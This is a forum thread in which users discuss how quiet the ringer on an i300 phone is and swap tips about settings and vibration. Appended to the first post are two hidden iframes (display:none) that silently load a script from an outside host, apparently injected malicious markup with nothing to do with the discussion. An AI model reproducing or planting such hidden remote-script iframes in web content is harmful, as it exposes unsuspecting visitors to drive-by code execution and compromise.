+ Reply to Thread

How load is your ringer?

I seem to think that my ringer is rather quiet. Does anyone else have any problems with this? I can have my i300 in my pocket and have the ringer go off and not even hear it. Some of my friends cells I can here 15 feet away. Thoughts or input?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

A lot of owners have the same problem. The only solution I might offer is to turn the ringer to the highest setting which will also enable the phone to vibrate. Other than that... perhaps a case with a belt clip may work.

Administrator

Arrow

i hear my ringer fine... i have heard other phones with louder "tones" (pitch) also, but i have no problems here...

hmm.. how "load" is your ringer??? :p

ringer options

are there other rings (sounds) that can be downloaded and if so are they louder?

Administrator

Arrow

none can be downloaded at this time.... we are stuck with what we have in the cell!:p

my friend uses a cell phone which rings much louder than mine does. Yet, I can hear his ringing while we are in a loud place, and he cant even hear it. I can hear mine also, and I am glad the vibrate feature is present with the ringer. I wish it had the ability to vibrate first and then ring like my old timeport did. its good enough though!